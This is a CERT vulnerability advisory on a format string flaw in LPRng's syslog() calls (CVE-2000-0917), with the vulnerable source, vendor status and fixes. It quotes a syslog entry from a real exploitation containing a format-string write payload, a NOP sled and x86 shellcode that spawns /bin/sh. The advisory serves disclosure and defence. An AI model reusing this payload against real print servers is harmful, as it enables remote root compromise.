Vulnerability Note VU#382365

LPRng can pass user-supplied input as a format string parameter to syslog() calls

Original Release date: 04 Dec 2000 | Last revised: 27 Jan 2003

Overview

A popular replacement software package to the BSD lpd printing service called LPRng contains at least one software defect known as a "format string vulnerability" which may allow remote users to execute arbitrary code on vulnerable systems. The privileges of such code will probably be root-level.

Description

LPRng, the "next generation" of print-service management software now being packaged in several open-source operating system distributions, has a missing format string argument in at least two calls to the syslog() function. Missing format strings in function calls which allow user-supplied arguments to be passed to a susceptible *snprintf() function call may allow remote users with access to the printer port (port 515/tcp) to pass format-string parameters that can overwrite arbitrary addresses in the printing service's address space. Such overwriting can cause segmentation violations leading to denial of printing services or lead to the execution of arbitrary code injected through other means into the memory segments of the printer service.

The vulnerable calls in this case occur in the following section of code:

LPRng-3.6.24/src/common/errormsg.c, use_syslog()
---
static void use_syslog(int kind, char *msg)
[...]
# ifdef HAVE_OPENLOG
        /* use the openlog facility */
        openlog(Name, LOG_PID | LOG_NOWAIT, SYSLOG_FACILITY );
        syslog(kind, msg);
        closelog();

# else
    (void) syslog(SYSLOG_FACILITY | kind, msg);
# endif                                                 /* HAVE_OPENLOG */
[...]


Sample syslog entries from exploitation of this vulnerability:

Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
XXXXXXXXXXXXXXXXXX%.168u%300$nsecurity.%301 $nsecurity%302$n%.192u%303$n
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}
1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}{B2}f{89}{D0}1{C9}{89}{CB}C{89}
]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}
E{EE}{F}'{89}M{F0}{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}
M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}
?{89}{D0}{CD}{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}
E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}/bin/sh{A}'

Impact

A remote user may be able to execute arbitrary code or perpetuate a denial of service. The privileges the malicious code would have depends on whether the print daemon drops it's root privileges before or after the calls to the vulnerable syslog() functions.

Solution

Upgrade to non-vulnerable version of LPRng (3.6.25), as described in the vendors sections below.

Disallow access to printer service ports (typically 515/tcp) using firewall or packet-filtering technologies.

Systems Affected (Learn More)

VendorStatusDate NotifiedDate Updated
DebianAffected06 Dec 200007 Dec 2000
FreeBSDAffected06 Dec 200011 Dec 2000
NetBSDAffected06 Dec 200011 Dec 2000
Patrick PowellAffected-05 Dec 2000
Red Hat Inc.Affected26 Sep 200027 Jan 2003
The SCO Group (SCO Linux)Affected-05 Dec 2000
TrustixAffected-04 Dec 2000
Apple Computer Inc.Not Affected06 Dec 200011 Dec 2000
Compaq Computer CorporationNot Affected06 Dec 200011 Dec 2000
Hewlett-Packard CompanyNot Affected06 Dec 200011 Dec 2000
IBMNot Affected06 Dec 200011 Dec 2000
Microsoft CorporationNot Affected06 Dec 200011 Dec 2000
OpenBSDNot Affected06 Dec 200007 Dec 2000
SGINot Affected06 Dec 200012 Dec 2000
SuSE Inc.Not Affected-05 Dec 2000
If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)

Group Score Vector
Base N/A N/A
Temporal N/A N/A
Environmental N/A N/A

References

Credit

Thanks to Chris Evans for making this code sample public.

This document was written by Jeffrey S Havrilla.

Other Information

  • CVE IDs: CVE-2000-0917
  • CERT Advisory: CA-2000-22
  • Date Public: 25 Sep 2000
  • Date First Published: 04 Dec 2000
  • Date Last Updated: 27 Jan 2003
  • Severity Metric: 48.20
  • Document Revision: 41

Feedback

If you have feedback, comments, or additional information about this vulnerability, please send us email.